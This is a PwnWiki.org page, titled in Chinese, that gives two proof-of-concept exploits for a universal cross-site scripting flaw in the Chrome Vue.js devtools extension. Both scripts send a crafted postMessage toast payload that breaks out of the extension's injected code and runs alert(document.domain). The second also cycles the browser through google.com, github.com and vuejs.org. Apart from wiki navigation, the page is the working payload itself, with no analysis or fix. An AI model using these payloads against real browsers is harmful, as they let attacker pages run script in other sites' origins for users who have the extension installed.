Chrome 插件 Vue.js devtools UXSS

XSS1

<script>
    setInterval(() => {
        window.postMessage({
            vueDetected: true,
            vueToast: {
                message: '`,`normal`); function __VUE_DEVTOOLS_TOAST__(){}; alert(document.domain);//'
            }
        }, '*')
    }, 1000)
</script>

XSS2

<script>
    const urls = ['https://www.google.com/', 'https://github.com', 'https://vuejs.org/']
    var i = 0;
    setInterval(() => {
        window.postMessage({
            vueDetected: true,
            vueToast: {
                message: '`,`normal`); function __VUE_DEVTOOLS_TOAST__(){}; alert(document.domain); location=`' + urls[i++%3] +'`//'
            }
        }, '*')
    }, 3000)
</script>

Anonymous

Search

Chrome 插件 Vue.js devtools UXSS

Namespaces

More

Page actions

XSS1

XSS2

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

Chrome 插件 Vue.js devtools UXSS

XSS1

XSS2

Navigation

Wiki tools

Page tools